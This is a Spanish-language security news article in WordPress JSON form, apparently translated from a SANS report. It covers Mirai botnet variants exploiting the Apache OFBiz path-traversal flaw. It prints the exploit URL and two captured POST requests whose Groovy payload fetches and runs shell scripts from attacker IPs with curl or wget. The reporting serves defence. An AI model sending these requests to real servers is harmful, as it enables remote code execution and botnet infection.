{"id":1301887,"date":"2024-08-02T15:03:11","date_gmt":"2024-08-02T15:03:11","guid":{"rendered":"https:\/\/teknomers.com\/es\/la-botnet-mirai-que-ataca-a-los-servidores-ofbiz-es-vulnerable-a-la-travesia-de-directorios\/"},"modified":"2024-08-02T15:03:15","modified_gmt":"2024-08-02T15:03:15","slug":"la-botnet-mirai-que-ataca-a-los-servidores-ofbiz-es-vulnerable-a-la-travesia-de-directorios","status":"publish","type":"post","link":"https:\/\/teknomers.com\/es\/la-botnet-mirai-que-ataca-a-los-servidores-ofbiz-es-vulnerable-a-la-travesia-de-directorios\/","title":{"rendered":"La botnet Mirai que ataca a los servidores OFBiz es vulnerable a la traves\u00eda de directorios"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p><span class=\"p-author\"><i class=\"icon-font icon-calendar\">\ue802<\/i><span class=\"author\">02 de agosto de 2024<\/span><i class=\"icon-font icon-user\">\ue804<\/i><span class=\"author\">Las noticias de los hackers<\/span><\/span><span class=\"p-tags\">Vulnerabilidad \/ Seguridad de la red<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\"><a rel=\"nofollow\" href=\"https:\/\/teknomers.com\/es\/wp-content\/uploads\/2024\/08\/La-botnet-Mirai-que-ataca-a-los-servidores-OFBiz-es.jpg\" style=\"clear: left; display: block; float: left; text-align: center;\"><\/a><\/div>\n<p>El software de planificaci\u00f3n de recursos empresariales (ERP) es la base de muchas empresas que respaldan los recursos humanos, la contabilidad, el transporte y la fabricaci\u00f3n. Estos sistemas pueden llegar a ser muy complejos y dif\u00edciles de mantener. Suelen estar altamente personalizados, lo que puede dificultar la aplicaci\u00f3n de parches. Sin embargo, las vulnerabilidades cr\u00edticas siguen afectando a estos sistemas y ponen en riesgo los datos empresariales cr\u00edticos. <\/p>\n<p>El Centro de Tormentas de Internet de SANS <a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/diary\/Increased%20Activity%20Against%20Apache%20OFBiz%20CVE-2024-32113\/31132\" target=\"_blank\">public\u00f3 un informe<\/a> mostrando c\u00f3mo el marco ERP de c\u00f3digo abierto OFBiz es actualmente el objetivo de nuevas variedades de la botnet Mirai.<\/p>\n<p>Como parte de su amplia cartera de proyectos, la Fundaci\u00f3n Apache apoya <a rel=\"nofollow noopener\" href=\"https:\/\/ofbiz.apache.org\/\" target=\"_blank\">OFBiz<\/a>un marco basado en Java para crear aplicaciones ERP (planificaci\u00f3n de recursos empresariales). OFBiz parece ser <a rel=\"nofollow noopener\" href=\"https:\/\/6sense.com\/tech\/erp\/apache-ofbiz-market-share\" target=\"_blank\">mucho menos frecuente<\/a> que las alternativas comerciales. Sin embargo, al igual que con cualquier otro sistema ERP, las organizaciones dependen de \u00e9l para datos comerciales confidenciales, y la seguridad de estos sistemas ERP es fundamental.<\/p>\n<p>En mayo de este a\u00f1o, un <a rel=\"nofollow noopener\" href=\"https:\/\/lists.apache.org\/thread\/w6s60okgkxp2th1sr8vx0ndmgk68fqrd\" target=\"_blank\">actualizaci\u00f3n de seguridad cr\u00edtica<\/a> para OFBiz. La actualizaci\u00f3n solucion\u00f3 una vulnerabilidad de navegaci\u00f3n de directorios que pod\u00eda provocar la ejecuci\u00f3n remota de comandos. Las versiones de OFBiz anteriores a la 18.12.13 se vieron afectadas. Unas semanas despu\u00e9s, <a rel=\"nofollow noopener\" href=\"https:\/\/xz.aliyun.com\/t\/14733\" target=\"_blank\">detalles sobre la vulnerabilidad<\/a> Se hicieron p\u00fablicos.<\/p>\n<p>Las vulnerabilidades de cruce de directorios o de cruce de rutas se pueden utilizar para eludir las reglas de control de acceso. Por ejemplo, si un usuario puede acceder a un directorio &#8220;\/public&#8221; pero no a un directorio &#8220;\/admin&#8221;, un atacante puede utilizar una URL como &#8220;\/public\/..\/admin&#8221; para enga\u00f1ar a la l\u00f3gica de control de acceso. Recientemente, CISA y FBI <a rel=\"nofollow noopener\" href=\"https:\/\/www.cisa.gov\/resources-tools\/resources\/secure-design-alert-eliminating-directory-traversal-vulnerabilities-software\" target=\"_blank\">lanz\u00f3 una alerta<\/a> Como parte de la iniciativa &#8220;Secure by Design&#8221;, centrada en el rastreo de directorios, CISA se\u00f1al\u00f3 que actualmente est\u00e1n rastreando 55 vulnerabilidades de rastreo de directorios como parte del cat\u00e1logo &#8220;Known Exploited Vulnerabilities&#8221; (KEV).<\/p>\n<p>En el caso de OFBiz, el recorrido de directorio se activa f\u00e1cilmente insertando un punto y coma. Todo lo que tiene que encontrar un atacante es una URL a la que pueda acceder y agregar un punto y coma seguido de una URL restringida. La URL del exploit que vemos actualmente es:<\/p>\n<p><code><\/p>\n<pre>\/webtools\/control\/forgotPassword;\/ProgramExport<\/pre>\n<p><\/code><\/p>\n<p>Dado que los usuarios deben poder restablecer sus contrase\u00f1as sin iniciar sesi\u00f3n primero, &#8220;forgotPassword&#8221; no requiere ninguna autenticaci\u00f3n. &#8220;ProgramExport&#8221;, por otro lado, debe tener acceso controlado y no se puede acceder a \u00e9l a menos que el usuario haya iniciado sesi\u00f3n. &#8220;ProgramExport&#8221; es particularmente peligroso porque permite la ejecuci\u00f3n de c\u00f3digo arbitrario. La l\u00f3gica defectuosa en OFBiz dej\u00f3 de evaluar la URL en el punto y coma. Esto permiti\u00f3 que cualquier usuario, sin iniciar sesi\u00f3n, accediera a la segunda parte de la URL, &#8220;\/ProgramExport&#8221;. <\/p>\n<p>Un atacante debe utilizar una solicitud POST para explotar la vulnerabilidad, pero no necesariamente necesita un cuerpo de solicitud. En cambio, un par\u00e1metro de URL funcionar\u00e1 perfectamente. <\/p>\n<p>El <a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/\" target=\"_blank\">Centro de tormentas de Internet SANS<\/a> Utiliza una extensa red de honeypots para detectar intentos de explotar una amplia gama de vulnerabilidades de aplicaciones web. Los nuevos intentos de explotaci\u00f3n importantes se resumen en un &#8220;<a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/weblogs\/firstseenurls.html\" target=\"_blank\">Visto por primera vez<\/a>&#8221; informe. Este fin de semana, estos sensores detectaron un aumento significativo en los intentos de explotar CVE-2024-32213, la vulnerabilidad de navegaci\u00f3n de directorios mencionada anteriormente por OFBiz, que fue inmediatamente detectada por el informe &#8220;First Seen&#8221;.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a rel=\"nofollow\" href=\"https:\/\/teknomers.com\/es\/wp-content\/uploads\/2024\/08\/La-botnet-Mirai-que-ataca-a-los-servidores-OFBiz-es.png\" style=\"clear: left; display: block; float: left; text-align: center;\"><img decoding=\"async\" src=\"https:\/\/teknomers.com\/es\/wp-content\/uploads\/2024\/08\/La-botnet-Mirai-que-ataca-a-los-servidores-OFBiz-es.png\" alt=\"\" border=\"0\" data-original-height=\"352\" data-original-width=\"728\"\/><\/a><\/div>\n<p>Los intentos de explotaci\u00f3n se originaron desde dos direcciones IP diferentes que tambi\u00e9n estaban asociadas con varios intentos de explotaci\u00f3n de dispositivos IoT, com\u00fanmente asociados con las variedades actuales de la botnet &#8220;Mirai&#8221;.<\/p>\n<p>Los malhechores utilizaron dos versiones del exploit. La primera utiliz\u00f3 la URL para incluir el comando que el exploit pretend\u00eda ejecutar:<\/p>\n<p><code><\/p>\n<pre>POST \/webtools\/control\/forgotPassword;\/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https:\/\/95.214.27.196\/where\/bin.sh<\/pre>\n<p><\/code> <\/p>\n<p>El segundo utiliz\u00f3 el cuerpo de la solicitud del comando, lo cual es m\u00e1s com\u00fan para las solicitudes &#8220;POST&#8221;:<\/p>\n<p>  <code><\/p>\n<pre>POST \/webtools\/control\/forgotPassword;\/ProgramExport HTTP\/1.1\nUser-Agent: Mozilla\/5.0 (Linux; Linux x86_64; en-US) Gecko\/20100101 Firefox\/122.0\nHost: [victim IP address]\nAccept: *\/*\nUpgrade-Insecure-Requests: 1\nConnection: keep-alive\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 147\ngroovyProgram=throw+new+Exception('curl https:\/\/185.196.10.231\/sh | sh -s ofbiz || wget -O- https:\/\/185.196.10.231\/sh | sh -s ofbiz'.execute().text);\n<\/pre>\n<p><\/code> <\/p>\n<p>Lamentablemente, no se recuper\u00f3 ni el script &#8220;bin.sh&#8221; ni el &#8220;sh&#8221;. Las direcciones IP se utilizaron en los an\u00e1lisis del 29 de julio, utilizando el agente de usuario &#8220;KrebsOnSecurity&#8221;, un gui\u00f1o al blogger de seguridad inform\u00e1tica Brian Krebs. Sin embargo, las URL analizadas eran en su mayor\u00eda parasitarias, en busca de shells web existentes que hab\u00edan quedado de ataques anteriores. La direcci\u00f3n IP tambi\u00e9n se utiliz\u00f3 para distribuir un archivo llamado &#8220;botx.arm&#8221;. Este nombre de archivo suele asociarse con variantes de Mirai.<\/p>\n<p>Con el anuncio de la vulnerabilidad en mayo, hemos estado esperando algunos an\u00e1lisis para aprovechar la vulnerabilidad de OFBiz. La explotaci\u00f3n fue trivial y, si bien la poblaci\u00f3n vulnerable y expuesta es peque\u00f1a, esto no ha detenido a los atacantes en el pasado. Pero ahora al menos est\u00e1n experimentando y tal vez agregando la vulnerabilidad a bots como las variantes de Mirai.<\/p>\n<p>S\u00f3lo hay unas pocas direcciones IP involucradas:<\/p>\n<ul style=\"text-align: left;\">\n<li><a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/ipinfo\/95.214.27.196\" target=\"_blank\">95.214.27.196<\/a>:Env\u00edo de exploit como par\u00e1metro de URL y alojamiento de malware.<\/li>\n<li><a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/ipinfo\/83.222.191.62\" target=\"_blank\">83.222.191.62<\/a>:Enviando exploit como cuerpo de solicitud. Malware alojado en 185.196.10.231. A principios de julio, esta IP fue escaneada en busca de vulnerabilidades de IoT.<\/li>\n<li><a rel=\"nofollow noopener\" href=\"https:\/\/isc.sans.edu\/ipinfo\/185.196.10.231\" target=\"_blank\">185.196.10.231<\/a>: hospedaje de malware<\/li>\n<\/ul>\n<p>Si este art\u00edculo le result\u00f3 interesante y le gustar\u00eda profundizar m\u00e1s en el mundo de la seguridad de aplicaciones web, API y microservicios, puede unirse a m\u00ed en Network Security 2024 (del 4 al 9 de septiembre) para <a rel=\"nofollow noopener\" href=\"https:\/\/www.sans.org\/cyber-security-courses\/application-security-securing-web-apps-api-microservices\/?utm_medium=Sponsored_Content&amp;utm_source=Hacker_News&amp;utm_content=JU_OFBiz_Servers_Article_THN_NetSec24_SEC522&amp;utm_campaign=SANS_Network_Security_2024&amp;utm_rdetail=NA&amp;utm_goal=Orders&amp;utm_type=Live_Training_Events\" target=\"_blank\">Mi curso, SEC522<\/a>. <a rel=\"nofollow noopener\" href=\"https:\/\/www.sans.org\/mlp\/networksecurity\/?utm_medium=Sponsored_Content&amp;utm_source=Hacker_News&amp;utm_content=JU_OFBiz_Servers_Article_THN_NetSec24&amp;utm_campaign=SANS_Network_Security_2024&amp;utm_rdetail=NA&amp;utm_goal=Orders&amp;utm_type=Live_Training_Events\" target=\"_blank\">Vea todo lo que le espera al evento aqu\u00ed.<\/a><\/p>\n<p><\/p>\n<div class=\"cf note-b\">\u00bfTe result\u00f3 interesante este art\u00edculo? <span class=\"\">Este art\u00edculo es una contribuci\u00f3n de uno de nuestros valiosos socios.<\/span> Siga con nosotros <a rel=\"nofollow noopener\" href=\"https:\/\/twitter.com\/thehackersnews\" target=\"_blank\">Gorjeo <i class=\"icon-font icon-twitter\">\uf099<\/i><\/a>  y <a rel=\"nofollow noopener\" href=\"https:\/\/www.linkedin.com\/company\/thehackernews\/\" target=\"_blank\">LinkedIn<\/a> para leer m\u00e1s contenido exclusivo que publicamos.<\/div>\n<\/div>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><br \/>\n<br \/><br \/>\n<br \/><a href=\"https:\/\/thehackernews.com\/2024\/08\/mirai-botnet-targeting-ofbiz-servers.html\" rel=\"nofollow noopener\" target=\"_blank\">ttn-es-57<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\ue80202 de agosto de 2024\ue804Las noticias de los hackersVulnerabilidad \/ Seguridad de la red El software de planificaci\u00f3n<\/p>\n","protected":false},"author":1,"featured_media":1301888,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[4657,4656,4397,4661,5895,4664,5061,4662,4668,4667,36,239182,45938,4654,239508,4658,4659,4653,222872,4666,4665,7982,34065,239484,5375],"class_list":["post-1301887","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tecnologia","tag-actualizaciones-ciberneticas","tag-actualizaciones-de-seguridad-cibernetica","tag-ataca","tag-ataques-ciberneticos","tag-botnet","tag-como-hackear","tag-directorios","tag-filtracion-de-datos","tag-la-seguridad-informatica","tag-las-noticias-de-los-hackers","tag-los","tag-malware-ransomware","tag-mirai","tag-noticias-ciberneticas","tag-noticias-de-ciberseguridad-hoy","tag-noticias-de-hackers","tag-noticias-de-pirateria","tag-noticias-de-seguridad-cibernetica","tag-ofbiz","tag-seguridad-de-informacion","tag-seguridad-de-la-red","tag-servidores","tag-travesia","tag-vulnerabilidad-del-software","tag-vulnerable"],"_links":{"self":[{"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/posts\/1301887","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/comments?post=1301887"}],"version-history":[{"count":0,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/posts\/1301887\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/media\/1301888"}],"wp:attachment":[{"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/media?parent=1301887"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/categories?post=1301887"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/teknomers.com\/es\/wp-json\/wp\/v2\/tags?post=1301887"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}